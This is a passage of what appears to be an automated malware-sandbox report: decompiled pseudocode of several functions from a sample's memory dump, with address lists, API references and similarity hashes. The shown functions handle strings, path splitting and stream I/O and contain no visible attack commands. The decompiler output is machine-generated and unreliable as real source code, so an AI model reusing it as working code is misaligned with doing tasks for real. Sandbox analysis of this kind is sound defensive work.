							} else {
								 *((char*)( *_t35)) = _a8;
							}
						}
						 *((intOrPtr*)(_t35 + 0x10)) = _t34;
						if( *((intOrPtr*)(_t35 + 0x14)) < 0x10) {
							 *((char*)(_t35 + _t34)) = 0;
							goto L21;
						} else {
							 *((char*)( *_t35 + _t34)) = 0;
							return _t35;
						}
					}
				}
			}

0x0040bfb0
0x0040bfb2
0x0040bfb6
0x0040bfbb
0x0040bfc2
0x0040bfc2
0x0040bfca
0x0040bfd1
0x0040bfd1
0x0040bfd6
0x0040bfdb
0x0040c002
0x00000000
0x0040c004
0x0040c004
0x0040c00a
0x0040c018
0x0040c01b
0x0040c01f
0x0040c00c
0x0040c00e
0x0040c015
0x0040c015
0x0040c00a
0x0040bfdd
0x0040bfe2
0x0040bfe9
0x0040c065
0x0040c068
0x0040bfeb
0x0040bfeb
0x0040bfee
0x0040c030
0x0040c036
0x0040c032
0x0040c032
0x0040c032
0x0040c040
0x0040bff0
0x0040bff4
0x0040c028
0x0040bff6
0x0040bffc
0x0040bffc
0x0040bff4
0x0040c04c
0x0040c04f
0x0040c060
0x00000000
0x0040c051
0x0040c053
0x0040c05b
0x0040c05b
0x0040c04f
0x0040bfe9

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040BFC2

Part of subcall function 0040DF21: std::exception::exception.LIBCMT ref: 0040DF36
Part of subcall function 0040DF21: __CxxThrowException@8.LIBCMT ref: 0040DF4B
Part of subcall function 0040DF21: std::exception::exception.LIBCMT ref: 0040DF5C

std::_Xinvalid_argument.LIBCPMT ref: 0040BFD1

Strings

string too long, xrefs: 0040BFBD, 0040BFCC

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
String ID: string too long
API String ID: 963545896-2556327735
Opcode ID: f843f64cca97121092a81eff1a3a5b55bf34624b0fc212ad1913d40b228f0240
Instruction ID: 0104903dbb4fd6062a596cc5c1930219d7ee374508edc7510dc6bd52756b5845
Opcode Fuzzy Hash: f843f64cca97121092a81eff1a3a5b55bf34624b0fc212ad1913d40b228f0240
Instruction Fuzzy Hash: AF21B331208351CBC3319B5C988062BEBE4ABA2710F210E6FF4E1E73D1C3799845C7AA

Uniqueness

Uniqueness Score: -1.00%

Function 004138A0 Relevance: 6.5, APIs: 4, Instructions: 463
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E004138A0(intOrPtr __ecx, void* __edx, intOrPtr _a4, signed char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				char _v8;
				intOrPtr _v16;
				char _v20;
				signed int _v28;
				signed int _v32;
				char _v44;
				char _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				char _v104;
				char* _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				char _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				char _v156;
				char _v160;
				char _v164;
				char _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				char* _t262;
				intOrPtr _t272;
				void* _t274;
				intOrPtr _t286;
				intOrPtr _t287;
				intOrPtr _t292;
				void* _t299;
				void* _t323;
				intOrPtr _t335;
				void* _t338;
				void* _t340;
				signed int _t356;
				intOrPtr _t388;
				intOrPtr _t392;
				intOrPtr _t393;
				intOrPtr _t431;
				intOrPtr _t432;
				signed int _t457;
				signed int _t459;
				intOrPtr _t462;
				intOrPtr _t464;
				signed int _t470;
				intOrPtr _t479;
				intOrPtr _t486;
				intOrPtr _t489;
				intOrPtr _t490;
				intOrPtr _t494;
				intOrPtr _t499;

				_push(0xffffffff);
				_push(E0044E9AB);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t499;
				_v176 = __ecx;
				if(E00417620(_a4) != 0) {
					__eflags = E00411DA0(_a4, "/") & 0x000000ff;
					if(__eflags == 0) {
						E004109E0( &_v44);
						_v8 = 0;
						_v52 = 0;
						_v48 = 0;
						_t262 = E00401B00(_a4, 0);
						__eflags =  *_t262 - 0x2f;
						if( *_t262 == 0x2f) {
							_t356 = _v52 + 1;
							__eflags = _t356;
							_v52 = _t356;
						}
						_v56 = 0;
						while(1) {
							__eflags = _v52 - E00417620(_a4);
							if(__eflags >= 0) {
								break;
							}
							_v48 = E00417640(_a4, 0x2f, _v52);
							__eflags = _v48 -  *0x4520a4; // 0xffffffff
							if(__eflags == 0) {
								_v48 = E00417620(_a4);
							}
							_v180 = E00417660(_a4,  &_v156, _v52, _v48 - _v52);
							_v184 = _v180;
							_v8 = 1;
							E00418830( &_v44, __eflags, _v184);
							_v8 = 0;
							E004034C0( &_v156);
							_v56 = _v56 + 1;
							_v52 = _v48 + 1;
						}
						_v32 = 0;
						_v28 = 0;
						E004188A0( &_v20);
						_v20 =  *((intOrPtr*)(E00410A90( &_v44,  &_v160)));
						while(1) {
							__eflags = E00418900( &_v20, __eflags, E00418600( &_v44,  &_v164)) & 0x000000ff;
							if(__eflags == 0) {
								break;
							}
							_v56 = _v56 - 1;
							_v72 = 0;
							_v68 = 0;
							_v64 = 0xffffffff;
							_v60 = 0;
							_t274 = E004188C0( &_v20);
							_t457 = _v32;
							_v72 = E00414190(_v176, _t457, __eflags, _t457, _v28, _t274,  &_v64);
							_v68 = _t457;
							__eflags = _v68;
							if(__eflags > 0) {
								L16:
								_v32 = _v72;
								_v28 = _v68;
								goto L43;
							} else {
								__eflags = _v72;
								if(__eflags <= 0) {
									__eflags = _a8 & 0x000000ff;
									if(__eflags == 0) {
										L19:
										_v168 = 0;
										_v8 = 0xffffffff;
										E00410A40( &_v44, __eflags);
										_t272 = _v168;
									} else {
										__eflags =  *(_a20 + 0xf0) & 0x000000ff;
										if(__eflags != 0) {
											_t459 = _v32;
											_v80 = _t459;
											_v76 = _v28;
											_v32 = E00414610(_v176, _t459, __eflags);
											_v28 = _t459;
											_v108 = E004137E0(_v176, _v32, __eflags, _v32, _v28);
											 *_v108 = 1;
											E00404E30(E004188C0( &_v20));
											__eflags = _v56;
											 *((char*)(_v108 + 0x20)) = 0 | _v56 > 0x00000000;
											_t286 = _v108;
											__eflags =  *(_t286 + 0x20) & 0x000000ff;
											if(( *(_t286 + 0x20) & 0x000000ff) != 0) {
												_t462 = _v108;
												 *((intOrPtr*)(_t462 + 0x28)) = 0;
												 *((intOrPtr*)(_t462 + 0x2c)) = 0;
											} else {
												_t494 = _v108;
												 *((intOrPtr*)(_t494 + 0x28)) = _a24;
												 *((intOrPtr*)(_t494 + 0x2c)) = _a28;
											}
											_t287 = _v108;
											 *((intOrPtr*)(_t287 + 0x30)) = 0xfffffffe;
											 *((intOrPtr*)(_t287 + 0x34)) = 0;
											_t388 = _v108;
											 *((intOrPtr*)(_t388 + 0x48)) = 0xffffffff;
											 *((intOrPtr*)(_t388 + 0x4c)) = 0;
											__eflags = _v64 - 0xffffffff;
											if(__eflags != 0) {
												L26:
												_v112 = E004137E0(_v176, _v64, __eflags, _v64, _v60);
												__eflags = E004135F0(_v112, _v108);
												if(__eflags >= 0) {
													_t392 = _v108;
													_t464 = _v112;
													 *((intOrPtr*)(_t392 + 0x40)) =  *((intOrPtr*)(_t464 + 0x38));
													 *((intOrPtr*)(_t392 + 0x44)) =  *((intOrPtr*)(_t464 + 0x3c));
													_t292 = _v108;
													 *((intOrPtr*)(_t292 + 0x38)) = 0xffffffff;
													 *((intOrPtr*)(_t292 + 0x3c)) = 0;
													_t393 = _v112;
													 *((intOrPtr*)(_t393 + 0x38)) = _v32;
													 *((intOrPtr*)(_t393 + 0x3c)) = _v28;
												} else {
													_t431 = _v108;
													_t486 = _v112;
													 *((intOrPtr*)(_t431 + 0x38)) =  *((intOrPtr*)(_t486 + 0x40));
													 *((intOrPtr*)(_t431 + 0x3c)) =  *((intOrPtr*)(_t486 + 0x44));
													_t335 = _v108;
													 *((intOrPtr*)(_t335 + 0x40)) = 0xffffffff;
													 *((intOrPtr*)(_t335 + 0x44)) = 0;
													_t432 = _v112;
													 *((intOrPtr*)(_t432 + 0x40)) = _v32;
													 *((intOrPtr*)(_t432 + 0x44)) = _v28;
												}
												E00414550(_v176, _a12, __eflags, _v64, _v60, _a12, _a16);
											} else {
												__eflags = _v60;
												if(__eflags != 0) {
													goto L26;
												} else {
													_t489 = _v108;
													 *((intOrPtr*)(_t489 + 0x38)) = 0xffffffff;
													 *((intOrPtr*)(_t489 + 0x3c)) = 0;
													_t338 = E004137E0(_v176, _t489, __eflags, _v80, _v76);
													_t490 = _v108;
													 *((intOrPtr*)(_t490 + 0x40)) =  *((intOrPtr*)(_t338 + 0x48));
													 *((intOrPtr*)(_t490 + 0x44)) =  *((intOrPtr*)(_t338 + 0x4c));
													_t340 = E004137E0(_v176, _v80, __eflags, _v80, _v76);
													 *((intOrPtr*)(_t340 + 0x48)) = _v32;
													 *((intOrPtr*)(_t340 + 0x4c)) = _v28;
													E00414550(_v176, _v76, __eflags, _v80, _v76, _a12, _a16);
												}
											}
											E00414550(_v176, _v32, __eflags, _v32, _v28, _a12, _a16);
											_t299 = E00427970(_a12, _a16, 0x80, 0);
											_t470 = _v28;
											_v88 = E00427970(_v32, _t470, _t299, _v32);
											_v84 = _t470;
											E00413250( *((intOrPtr*)(_a20 + 0xfc)),  &_v104, __eflags,  &_v104,  *((intOrPtr*)( *((intOrPtr*)(_a20 + 0xf4)) + 0x20)),  *((intOrPtr*)( *((intOrPtr*)(_a20 + 0xf4)) + 0x24)));
											_v8 = 2;
											while(1) {
												_v192 = E00417E20( &_v104);
												_v188 = 0;
												__eflags = _v188 - _v84;
												if(__eflags > 0) {
													break;
												}
												if(__eflags < 0) {
													L34:
													_v120 = E00413400( *((intOrPtr*)(_a20 + 0xfc)), __eflags);
													_v116 = 0;
													__eflags = E00417E20( &_v104);
													if(__eflags > 0) {
														_t323 = E00417E20( &_v104);
														asm("sbb edx, 0x0");
														E004131D0( *((intOrPtr*)(_a20 + 0xfc)),  *((intOrPtr*)(E00417E40( &_v104, _t323 - 1))), __eflags,  *((intOrPtr*)(E00417E40( &_v104, _t323 - 1))),  *((intOrPtr*)(_t325 + 4)), _v120, _v116);
														__eflags = E00417E20( &_v104) - 1;
														asm("sbb ecx, 0x0");
														E00413530( *((intOrPtr*)(_a20 + 0xfc)),  *((intOrPtr*)(E00417E40( &_v104, E00417E20( &_v104) - 1) + 4)), __eflags,  *_t330,  *((intOrPtr*)(E00417E40( &_v104, E00417E20( &_v104) - 1) + 4)), _a12, _a16);
													}
													E004131D0( *((intOrPtr*)(_a20 + 0xfc)), _v116, __eflags, _v120, _v116, 0xfffffffe, 0);
													E00413530( *((intOrPtr*)(_a20 + 0xfc)), _v120, __eflags, _v120, _v116, _a12, _a16);
													E00417E60( &_v104,  &_v120);
													_t479 =  *((intOrPtr*)( *((intOrPtr*)(_a20 + 0xfc))));
													_v128 = E00427900(_v120, _v116, E00427900(_t479,  *((intOrPtr*)( *((intOrPtr*)(_a20 + 0xfc)) + 4)), 8, 0), _t479);
													_v124 = _t479;
													while(1) {
														_v196 =  *((intOrPtr*)(_a20 + 0xf4));
														__eflags = _v124 -  *((intOrPtr*)(_v196 + 0x1c));
														if(__eflags < 0) {
															break;
														}
														if(__eflags > 0) {
															L40:
															E004166F0(_a20, __eflags);
															continue;
														} else {
															__eflags = _v128 -  *((intOrPtr*)(_v196 + 0x18));
															if(__eflags >= 0) {
																goto L40;
															}
														}
														break;
													}
													continue;
												} else {
													__eflags = _v192 - _v88;
													if(__eflags <= 0) {
														goto L34;
													}
												}
												break;
											}
											_v8 = 0;
											E00417D00( &_v104);
											L43:
											E004188E0( &_v20);
											continue;
										} else {
											goto L19;
										}
									}
								} else {
									goto L16;
								}
							}
							goto L45;
						}
						_v172 = E004137E0(_v176, _v28, __eflags, _v32, _v28);
						_v8 = 0xffffffff;
						E00410A40( &_v44, __eflags);
						_t272 = _v172;
					} else {
						_t272 = E004137E0(_v176, __edx, __eflags, 0, 0);
					}
				} else {
					_t272 = 0;
				}
				L45:
				 *[fs:0x0] = _v16;
				return _t272;
			}

0x004138a3
0x004138a5
0x004138b0
0x004138b1
0x004138be
0x004138ce
0x004138eb
0x004138ed
0x00413906
0x0041390b
0x00413912
0x00413919
0x00413925
0x0041392d
0x00413930
0x00413935
0x00413935
0x00413938
0x00413938
0x0041393b
0x00413942
0x0041394a
0x0041394d
0x00000000
0x00000000
0x00413961
0x00413967
0x0041396d
0x00413977
0x00413977
0x00413994
0x004139a0
0x004139a6
0x004139b4
0x004139b9
0x004139c3
0x004139ce
0x004139d7
0x004139d7
0x004139df
0x004139e6
0x004139f0
0x00413a06
0x00413a13
0x00413a2e
0x00413a30
0x00000000
0x00000000
0x00413a3c
0x00413a3f
0x00413a46
0x00413a4d
0x00413a54
0x00413a62
0x00413a6c
0x00413a7b
0x00413a7e
0x00413a81
0x00413a85
0x00413a8d
0x00413a90
0x00413a96
0x00000000
0x00413a87
0x00413a87
0x00413a8b
0x00413aa2
0x00413aa4
0x00413ab4
0x00413ab4
0x00413abe
0x00413ac8
0x00413acd
0x00413aa6
0x00413ab0
0x00413ab2
0x00413ad8
0x00413adb
0x00413ae1
0x00413aef
0x00413af2
0x00413b08
0x00413b0e
0x00413b20
0x00413b27
0x00413b31
0x00413b34
0x00413b3b
0x00413b3d
0x00413b50
0x00413b53
0x00413b5a
0x00413b3f
0x00413b3f
0x00413b45
0x00413b4b
0x00413b4b
0x00413b61
0x00413b64
0x00413b6b
0x00413b72
0x00413b75
0x00413b7c
0x00413b83
0x00413b87
0x00413c01
0x00413c14
0x00413c23
0x00413c25
0x00413c5b
0x00413c5e
0x00413c64
0x00413c6a
0x00413c6d
0x00413c70
0x00413c77
0x00413c7e
0x00413c84
0x00413c8a
0x00413c27
0x00413c27
0x00413c2a
0x00413c30
0x00413c36
0x00413c39
0x00413c3c
0x00413c43
0x00413c4a
0x00413c50
0x00413c56
0x00413c56
0x00413ca3
0x00413b89
0x00413b89
0x00413b8d
0x00000000
0x00413b8f
0x00413b8f
0x00413b92
0x00413b99
0x00413bae
0x00413bb3
0x00413bb9
0x00413bbf
0x00413bd0
0x00413bd8
0x00413bde
0x00413bf7
0x00413bf7
0x00413b8d
0x00413cbe
0x00413cd2
0x00413cd9
0x00413ce6
0x00413ce9
0x00413d0a
0x00413d0f
0x00413d13
0x00413d1d
0x00413d23
0x00413d2f
0x00413d32
0x00000000
0x00000000
0x00413d38
0x00413d49
0x00413d59
0x00413d5c
0x00413d67
0x00413d69
0x00413d76
0x00413d80
0x00413d9c
0x00413db3
0x00413db6
0x00413dd2
0x00413dd2
0x00413dec
0x00413e0a
0x00413e16
0x00413e2c
0x00413e43
0x00413e46
0x00413e49
0x00413e52
0x00413e61
0x00413e64
0x00000000
0x00000000
0x00413e66
0x00413e76
0x00413e79
0x00000000
0x00413e68
0x00413e71
0x00413e74
0x00000000
0x00000000
0x00413e74
0x00000000
0x00413e66
0x00000000
0x00413d3a
0x00413d40
0x00413d43
0x00000000
0x00000000
0x00413d43
0x00000000
0x00413d38
0x00413e85
0x00413e8c
0x00413e91
0x00413a0e
0x00000000
0x00000000
0x00000000
0x00000000
0x00413ab2
0x00000000
0x00000000
0x00000000
0x00413a8b
0x00000000
0x00413a85
0x00413ea9
0x00413eaf
0x00413eb9
0x00413ebe
0x004138ef
0x004138f9
0x004138f9
0x004138d0
0x004138d0
0x004138d0
0x00413ec4
0x00413ec7
0x00413ed1

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b481213efadde15f65b82027d25db4cfb0e9cf2de7cb5a6bc06b0a7a15e6284
Instruction ID: 21934d674ba4839d8467a208665aee8d65a82bf39d45c89ffcb65a4bef071f75
Opcode Fuzzy Hash: 5b481213efadde15f65b82027d25db4cfb0e9cf2de7cb5a6bc06b0a7a15e6284
Instruction Fuzzy Hash: 0422F7B1A00209DFCB14DF99D891FEEBBB5BF48314F20815EE519AB291D734A981CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0040C140 Relevance: 6.2, APIs: 4, Instructions: 181
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E0040C140(void* __ecx, void* __ebp) {
				signed char* _v4;
				char _v12;
				signed int _v16;
				intOrPtr _v24;
				signed char* _v28;
				intOrPtr _v32;
				signed char* _v44;
				char _v48;
				char _v52;
				char _v53;
				intOrPtr _v56;
				char _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				signed int _v81;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t65;
				signed int _t67;
				signed char _t71;
				void* _t74;
				signed char** _t76;
				signed int _t78;
				char* _t82;
				char* _t85;
				signed char* _t91;
				void* _t92;
				intOrPtr _t93;
				intOrPtr* _t100;
				char _t107;
				signed char** _t118;
				intOrPtr _t121;
				void* _t123;
				char* _t124;
				signed int _t126;
				void* _t128;
				intOrPtr _t129;
				signed char** _t133;
				void* _t140;
				signed int _t141;

				_push(0xffffffff);
				_push(E0044E2E8);
				_push( *[fs:0x0]);
				_t141 = _t140 - 0x2c;
				_t65 =  *0x4608e0; // 0xb51ec2b3
				_v16 = _t65 ^ _t141;
				_push(_t92);
				_push(__ebp);
				_t67 =  *0x4608e0; // 0xb51ec2b3
				_push(_t67 ^ _t141);
				 *[fs:0x0] =  &_v12;
				_t128 = __ecx;
				_t71 =  *( *(__ecx + 0x20));
				_t117 = 0;
				if(_t71 == 0) {
					L3:
					__eflags =  *(_t128 + 0x54) - _t117;
					if( *(_t128 + 0x54) == _t117) {
						L26:
						_t72 = _t71 | 0xffffffff;
						__eflags = _t71 | 0xffffffff;
						L27:
						 *[fs:0x0] = _v12;
						_pop(_t121);
						_pop(_t129);
						_pop(_t93);
						return E004230EF(_t72, _t93, _v16 ^ _t141, _t117, _t121, _t129);
					}
					_t100 =  *((intOrPtr*)(_t128 + 0x10));
					_t122 = _t128 + 0x48;
					__eflags =  *_t100 - _t128 + 0x48;
					if( *_t100 == _t128 + 0x48) {
						_t122 =  *((intOrPtr*)(_t128 + 0x3c));
						 *_t100 =  *((intOrPtr*)(_t128 + 0x3c));
						 *((intOrPtr*)( *((intOrPtr*)(_t128 + 0x20)))) =  *((intOrPtr*)(_t128 + 0x40));
						__eflags = 0;
						 *((intOrPtr*)( *((intOrPtr*)(_t128 + 0x30)))) = 0;
					}
					__eflags =  *((intOrPtr*)(_t128 + 0x44)) - _t117;
					if(__eflags != 0) {
						_v24 = 0xf;
						_v28 = _t117;
						_v44 = _t117;
						_v4 = _t117;
						_t117 =  *(_t128 + 0x54);
						_push( *(_t128 + 0x54));
						_t74 = E00423EDA(_t92, _t122, _t128, __eflags);
						_t141 = _t141 + 4;
						__eflags = _t74 - 0xffffffff;
						if(_t74 == 0xffffffff) {
							L25:
							_t71 = E004034C0( &_v44);
							goto L26;
						}
						_t123 = _t128 + 0x4c;
						while(1) {
							E00403B10( &_v44, 1, _t74);
							_t76 = _v52;
							_t118 = _t76;
							__eflags = _v32 - 0x10;
							if(_v32 < 0x10) {
								_t118 =  &_v44;
								_t76 = _t118;
							}
							_t117 = _t118 + _v28;
							_t94 =  *((intOrPtr*)( *((intOrPtr*)(_t128 + 0x44))));
							_t78 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t128 + 0x44)))) + 0x10))))(_t123, _t76, _t118 + _v28,  &_v52,  &_v53,  &_v52,  &_v48);
							__eflags = _t78;
							if(_t78 < 0) {
								goto L25;
							}
							__eflags = _t78 - 1;
							if(_t78 <= 1) {
								__eflags = _v76 -  &_v81;
								if(_v76 !=  &_v81) {
									__eflags = _v52 - 0x10;
									_t124 = _v72;
									if(_v52 < 0x10) {
										_t124 =  &_v72;
									}
									_t126 = _t124 - _v80 + _v56;
									__eflags = _t126;
									if(__eflags <= 0) {
										L32:
										E004034C0( &_v72);
										_t72 = _v81 & 0x000000ff;
										goto L27;
									} else {
										goto L31;
									}
									do {
										L31:
										_t117 =  *(_t128 + 0x54);
										_t107 =  *((char*)(_t126 + _v80 - 1));
										_t126 = _t126 - 1;
										_push( *(_t128 + 0x54));
										_push(_t107);
										E004241AD(_t94, _t126, _t128, __eflags);
										_t141 = _t141 + 8;
										__eflags = _t126;
									} while (__eflags > 0);
									goto L32;
								}
								__eflags = _v52 - 0x10;
								_t82 = _v72;
								if(_v52 < 0x10) {
									_t82 =  &_v72;
								}
								_t117 = _v80 - _t82;
								__eflags = _v80 - _t82;
								E00402DA0( &_v72, 0, _v80 - _t82);
								L24:
								_push( *(_t128 + 0x54));
								_t74 = E00423EDA(_t94, _t123, _t128, __eflags);
								_t141 = _t141 + 4;
								__eflags = _t74 - 0xffffffff;
								if(_t74 != 0xffffffff) {
									continue;
								}
								goto L25;
							}
							__eflags = _t78 - 3;
							if(_t78 != 3) {
								goto L25;
							}
							__eflags = _v56 - 1;
							if(__eflags < 0) {
								goto L24;
							}
							__eflags = _v52 - 0x10;
							_t85 = _v72;
							if(_v52 < 0x10) {
								_t85 =  &_v72;
							}
							E004246A7( &_v81, 1, _t85, 1);
							_t141 = _t141 + 0x10;
							E004034C0( &_v72);
							_t72 = _v81 & 0x000000ff;
							goto L27;
						}
						goto L25;
					} else {
						_push( *(_t128 + 0x54));
						_t71 = E00423EDA(_t92, _t122,  *(_t128 + 0x54), __eflags);
						_t141 = _t141 + 4;
						__eflags = _t71 - 0xffffffff;
						if(_t71 == 0xffffffff) {
							goto L26;
						}
						_t72 = _t71 & 0x000000ff;
						goto L27;
					}
				}
				_t71 =  *( *(__ecx + 0x20));
				if(_t71 >=  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x30)))) + _t71) {
					goto L3;
				}
				 *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x30)))) =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x30)))) - 1;
				_t133 =  *(__ecx + 0x20);
				_t91 =  *_t133;
				_t117 =  &(_t91[1]);
				 *_t133 =  &(_t91[1]);
				_t72 =  *_t91 & 0x000000ff;
				goto L27;
			}

0x0040c140
0x0040c142
0x0040c14d
0x0040c14e
0x0040c151
0x0040c158
0x0040c15c
0x0040c15d
0x0040c160
0x0040c167
0x0040c16c
0x0040c172
0x0040c177
0x0040c179
0x0040c17d
0x0040c1a6
0x0040c1a6
0x0040c1a9
0x0040c2f6
0x0040c2f6
0x0040c2f6
0x0040c2f9
0x0040c2fd
0x0040c305
0x0040c306
0x0040c308
0x0040c317
0x0040c317
0x0040c1af
0x0040c1b2
0x0040c1b5
0x0040c1b7
0x0040c1bc
0x0040c1bf
0x0040c1c4
0x0040c1c9
0x0040c1cb
0x0040c1cb
0x0040c1cd
0x0040c1d0
0x0040c1ef
0x0040c1f7
0x0040c1fb
0x0040c1ff
0x0040c203
0x0040c206
0x0040c207
0x0040c20c
0x0040c20f
0x0040c212
0x0040c2ed
0x0040c2f1
0x00000000
0x0040c2f1
0x0040c218
0x0040c21b
0x0040c222
0x0040c22b
0x0040c22f
0x0040c231
0x0040c234
0x0040c236
0x0040c23a
0x0040c23a
0x0040c23c
0x0040c243
0x0040c25f
0x0040c261
0x0040c263
0x00000000
0x00000000
0x0040c269
0x0040c26c
0x0040c2b1
0x0040c2b5
0x0040c318
0x0040c31d
0x0040c321
0x0040c323
0x0040c323
0x0040c32b
0x0040c32f
0x0040c331
0x0040c34e
0x0040c357
0x0040c35c
0x00000000
0x00000000
0x00000000
0x00000000
0x0040c333
0x0040c333
0x0040c337
0x0040c33a
0x0040c33f
0x0040c340
0x0040c341
0x0040c342
0x0040c347
0x0040c34a
0x0040c34a
0x00000000
0x0040c333
0x0040c2b7
0x0040c2bc
0x0040c2c0
0x0040c2c2
0x0040c2c2
0x0040c2ca
0x0040c2ca
0x0040c2d3
0x0040c2d8
0x0040c2db
0x0040c2dc
0x0040c2e1
0x0040c2e4
0x0040c2e7
0x00000000
0x00000000
0x00000000
0x0040c2e7
0x0040c26e
0x0040c271
0x00000000
0x00000000
0x0040c273
0x0040c278
0x00000000
0x00000000
0x0040c27a
0x0040c27f
0x0040c283
0x0040c285
0x0040c285
0x0040c293
0x0040c29d
0x0040c2a4
0x0040c2a9
0x00000000
0x0040c2a9
0x00000000
0x0040c1d2
0x0040c1d5
0x0040c1d6
0x0040c1db
0x0040c1de
0x0040c1e1
0x00000000
0x00000000
0x0040c1e7
0x00000000
0x0040c1e7
0x0040c1d0
0x0040c182
0x0040c18d
0x00000000
0x00000000
0x0040c192
0x0040c194
0x0040c197
0x0040c199
0x0040c19c
0x0040c19e
0x00000000

APIs

_fgetc.LIBCMT ref: 0040C1D6
_fgetc.LIBCMT ref: 0040C207
_memcpy_s.LIBCMT ref: 0040C293

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: _fgetc$_memcpy_s
String ID:
API String ID: 160369518-0
Opcode ID: aa192c574a08ec37ed5676f9de221d6af47aec807f285d5f0baee8f3e9245a8f
Instruction ID: 966c53d964d21659d192d1d6c079b415b27ad26b3c7c736cbfa9ec0c45aafec3
Opcode Fuzzy Hash: aa192c574a08ec37ed5676f9de221d6af47aec807f285d5f0baee8f3e9245a8f
Instruction Fuzzy Hash: 5B613731614740CFC724DB68C88092BB7F5BB89718F500F6EF486A7691E739EA45CB4A

Uniqueness

Uniqueness Score: -1.00%

Function 0042471C Relevance: 6.1, APIs: 4, Instructions: 130
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 96%

			E0042471C(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t56;
				signed int _t60;
				void* _t65;
				signed int _t66;
				signed int _t69;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t78;
				signed int _t79;
				signed int _t81;
				signed int _t85;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t95;
				intOrPtr* _t96;
				void* _t97;

				_t92 = _a8;
				if(_t92 == 0 || _a12 == 0) {
					L4:
					return 0;
				} else {
					_t96 = _a16;
					_t100 = _t96;
					if(_t96 != 0) {
						_t79 = _a4;
						__eflags = _t79;
						if(__eflags == 0) {
							goto L3;
						}
						_t60 = _t56 | 0xffffffff;
						_t88 = _t60 % _t92;
						__eflags = _a12 - _t60 / _t92;
						if(__eflags > 0) {
							goto L3;
						}
						_t93 = _t92 * _a12;
						__eflags =  *(_t96 + 0xc) & 0x0000010c;
						_v8 = _t79;
						_v16 = _t93;
						_t78 = _t93;
						if(( *(_t96 + 0xc) & 0x0000010c) == 0) {
							_v12 = 0x1000;
						} else {
							_v12 =  *(_t96 + 0x18);
						}
						__eflags = _t93;
						if(_t93 == 0) {
							L32:
							return _a12;
						} else {
							do {
								_t81 =  *(_t96 + 0xc) & 0x00000108;
								__eflags = _t81;
								if(_t81 == 0) {
									L18:
									__eflags = _t78 - _v12;
									if(_t78 < _v12) {
										_t65 = E00428975(_t88, _t93,  *_v8, _t96);
										__eflags = _t65 - 0xffffffff;
										if(_t65 == 0xffffffff) {
											L34:
											_t66 = _t93;
											L35:
											return (_t66 - _t78) / _a8;
										}
										_v8 = _v8 + 1;
										_t69 =  *(_t96 + 0x18);
										_t78 = _t78 - 1;
										_v12 = _t69;
										__eflags = _t69;
										if(_t69 <= 0) {
											_v12 = 1;
										}
										goto L31;
									}
									__eflags = _t81;
									if(_t81 == 0) {
										L21:
										__eflags = _v12;
										_t94 = _t78;
										if(_v12 != 0) {
											_t72 = _t78;
											_t88 = _t72 % _v12;
											_t94 = _t94 - _t72 % _v12;
											__eflags = _t94;
										}
										_push(_t94);
										_push(_v8);
										_push(E0042BB0F(_t96));
										_t71 = E0042C4C4(_t78, _t88, _t94, _t96, __eflags);
										_t97 = _t97 + 0xc;
										__eflags = _t71 - 0xffffffff;
